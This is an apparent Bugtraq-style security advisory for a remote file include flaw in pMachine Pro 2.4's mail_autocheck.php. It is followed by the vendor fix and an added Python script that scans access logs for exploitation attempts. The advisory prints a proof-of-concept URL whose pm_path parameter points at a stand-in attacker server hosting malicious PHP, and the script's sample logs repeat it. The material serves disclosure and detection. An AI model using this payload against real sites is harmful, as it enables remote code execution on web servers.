PMachine Pro Remote File Include Vulnerability
BID:12597
Info
| Bugtraq ID: | 12597 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 19 2005 12:00AM |
| Updated: | Feb 19 2005 12:00AM |
| Credit: | Discovery is credited to kc <[email protected]>. |
| Vulnerable: | PMachine PMachine Pro 2.4 |
| Not Vulnerable: | |
Discussion
PMachine Pro is reported prone to a remote file include vulnerability.
This issue affects the 'mail_autocheck.php' script.
An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This will facilitate unauthorized access.
The latest version (2.4) of pMachine Pro is reported vulnerable. It is possible that other versions are affected as well.
Exploit / POC
No exploit is required to leverage this issue.
The following proof of concept example is available:
http://www.example.com/pMachine/pm/add_ons/mail_this_entry/mail_autocheck.php?pm_path=http://attackers-webserver/malicious-code.php?
Solution / Fix
Solution:
The vendor has released an updated version of the affected 'mail_autocheck.php' file to address this vulnerability:
PMachine PMachine Pro 2.4
- PMachine mail_autocheck.zip
http://www.pmachine.com/misc/mail_autocheck.zip
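To check whether the request pattern shown in the proof of concept has reached a server, the access logs can be searched for 'mail_autocheck.php' requests whose 'pm_path' parameter names a remote resource. The following is an added example, not part of the original advisory or the vendor's code; it assumes Apache Common/Combined Log Format, and the function name and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Assumption: access logs are in Apache Common/Combined Log Format.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
# pm_path values that begin with a URL scheme or stream wrapper ("http:", "ftp:",
# "php:", ...) or a network path ("//host", "\\host") instead of a local directory.
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]+:|//|\\\\)', re.IGNORECASE)

def find_pm_path_includes(log_lines):
    """Return (client_ip, status, pm_path) for each request to mail_autocheck.php
    whose pm_path query parameter points at a remote resource."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parsable request line
        url = urlsplit(m.group("target"))
        # Decode the path so an encoded file name (mail_autocheck%2Ephp) still matches.
        if not unquote(url.path).lower().endswith("/mail_autocheck.php"):
            continue
        # parse_qsl percent-decodes names and values once, as the web server would.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if name == "pm_path" and REMOTE_RE.match(value):
                hits.append((m.group("ip"), int(m.group("status")), value))
    return hits

# Constructed sample log lines (documentation IP ranges, not from a real server).
SAMPLE_LOG = [
    '203.0.113.7 - - [19/Feb/2005:10:01:02 +0000] "GET /pMachine/pm/add_ons/'
    'mail_this_entry/mail_autocheck.php?pm_path=http://attackers-webserver/'
    'malicious-code.php? HTTP/1.1" 200 512',
    '198.51.100.9 - - [19/Feb/2005:10:05:40 +0000] "GET /pMachine/pm/add_ons/'
    'mail_this_entry/mail_autocheck.php?pm_path=http%3A%2F%2Fattackers-webserver'
    '%2Fmalicious-code.php%3F HTTP/1.1" 404 210',
    '192.0.2.15 - - [19/Feb/2005:10:06:11 +0000] "GET /pMachine/pm/add_ons/'
    'mail_this_entry/mail_autocheck.php HTTP/1.1" 200 1830',
    '192.0.2.15 - - [19/Feb/2005:10:06:30 +0000] "GET /pMachine/index.php?'
    'ref=http://www.example.com/ HTTP/1.1" 200 9021',
]

if __name__ == "__main__":
    for ip, status, value in find_pm_path_includes(SAMPLE_LOG):
        print(f"{ip} status={status} pm_path={value}")
```

Parameters sent in a POST body do not appear in access logs, so a clean result here does not replace installing the vendor's updated 'mail_autocheck.php'.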
References
References:
- Important Security Fix - Build Pro2.4.007 (pMachine)
- pMachine Homepage (pMachine)